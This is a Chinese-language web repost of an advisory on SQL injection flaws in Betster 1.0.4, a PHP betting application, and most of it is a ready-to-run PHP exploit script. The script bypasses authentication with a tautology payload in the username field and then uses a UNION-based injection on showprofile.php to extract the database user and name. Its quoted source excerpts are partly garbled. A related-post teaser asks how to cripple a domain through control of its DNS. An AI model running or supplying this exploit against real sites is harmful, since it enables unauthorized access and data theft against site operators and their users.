Betster(又名PHP Betoffice)是一套用于创建基于PHP、MySQL和JavaScript的在线赌场软件。
Betster 1.0.4版本中存在SQL注入漏洞,该漏洞源于showprofile.php或categoryedit.php脚本没有充分过滤‘id’参数;index.php脚本没有充分过滤‘login’函数中的‘username’参数。远程攻击者可利用该漏洞执行任意SQL命令。
getState()) &&
(($user->getStatus() == "administrator") ||
($user->getStatus() == "betmaster"))){
$mainhtml = file_get_contents("tpl/showprofile.inc");
$id = htmlspecialchars($_GET['id']); getUserById($id);
-----------------------------------------------------------------------------
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']); n";
print "nExample....: php $argv[0] localhost /";
print "nExample....: php $argv[0] localhost /betster/n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
$packet = "GET {$path} HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Connection: closernrn";
print "n ,--^----------,--------,-----,-------^--, n";
print " | ||||||||| `--------' | O n";
print " `+---------------------------^----------| n";
print " `_,-------, _________________________| n";
print " / XXXXXX /`| / n";
print " / XXXXXX / ` / n";
print " / XXXXXX /______( n";
print " / XXXXXX / n";
print " / XXXXXX / .. CWH Underground Hacking Team .. n";
print " (________( n";
print " `------' n";
$response = http_send($host, $packet);
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("n[-] Session ID not found!n");
$packet = "POST {$path}index.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cookie: {$sid[1]}rn";
$packet .= "Content-Type: application/x-www-form-urlencodedrn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Connection: closernrn{$payload}";
print "nn[+] Bypassing Authentication...n";
sleep(2);
$response=http_send($host, $packet);
preg_match('/menutitle">ADMIN/s', $response) ? print "n[+] Authentication Bypass Successfully !!n" : die("n[-] Bypass Authentication Failed !!n");
$packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0rn";
$packet .= "Cookie: {$sid[1]}rn";
$packet .= "Host: {$host}rn";
$packet .= "Connection: closernrn";
print "[+] Performing SQL Injection Attackn";
sleep(2);
$response1=http_send($host, $packet);
preg_match('/::(.*)::/', $response1, $m) ? print "n$m[1]n" : die("n[-] Exploit failed!n");
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
文章来源于lcx.cc:Betster SQL注入漏洞
相关推荐: 控制了一个域名的dns如何把这个域名搞残废,如何让百度K站
控制了一个域名的dns如何把这个域名搞残废 木易耳朵 | 2014-03-23 09:23 控制了一个域名的dns如何把这个域名搞残废。主要是让百度K站。 [原文地址] 相关吐槽: 1# 小威 (呵呵复呵呵,女神敲回车!) | 2014-03-23 09:34…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论